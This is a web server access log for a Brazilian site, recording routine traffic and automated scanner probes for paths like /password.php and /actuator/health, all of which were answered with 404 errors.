137.184.225.99 - - [21/Apr/2025:03:56:15 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
137.184.225.99 - - [21/Apr/2025:03:56:15 -0300] "GET /1.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
137.184.225.99 - - [21/Apr/2025:03:56:15 -0300] "GET /systembc/password.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
137.184.225.99 - - [21/Apr/2025:03:56:15 -0300] "GET /password.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
18.222.48.1 - - [21/Apr/2025:03:57:57 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
vacivitta.com.br:80
18.222.48.1 - - [21/Apr/2025:03:58:50 -0300] "SSH-2.0-Go" 404 - "-" "-"
vacivitta.com.br:80
147.185.132.64 - - [21/Apr/2025:03:59:53 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
147.185.132.64 - - [21/Apr/2025:03:59:53 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
18.222.48.1 - - [21/Apr/2025:04:00:41 -0300] "\n" 404 - "-" "-"
vacivitta.com.br:80
64.62.156.87 - - [21/Apr/2025:04:04:14 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
185.189.182.234 - - [21/Apr/2025:04:15:58 -0300] "GET / HTTP/1.1" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [21/Apr/2025:04:19:00 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
20.65.195.17 - - [21/Apr/2025:04:21:24 -0300] "GET /actuator/health HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
71.6.232.20 - - [21/Apr/2025:04:23:21 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
vacivitta.com.br:80
185.255.122.19 - - [21/Apr/2025:04:24:39 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [21/Apr/2025:04:40:24 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
206.198.244.144 - - [21/Apr/2025:04:47:01 -0300] "GET / HTTP/1.1" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [21/Apr/2025:04:54:37 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [21/Apr/2025:05:12:37 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
80.82.77.202 - - [21/Apr/2025:05:16:57 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
35.202.9.133 - - [21/Apr/2025:05:33:49 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
vacivitta.com.br:80
154.81.156.54 - - [21/Apr/2025:05:40:19 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
104.234.115.1 - - [21/Apr/2025:05:50:46 -0300] "GET / HTTP/1.0" 200 488 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
104.234.115.1 - - [21/Apr/2025:05:50:57 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
104.234.115.1 - - [21/Apr/2025:05:51:24 -0300] "GET / HTTP/1.1" 200 488 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
104.234.115.1 - - [21/Apr/2025:05:54:15 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
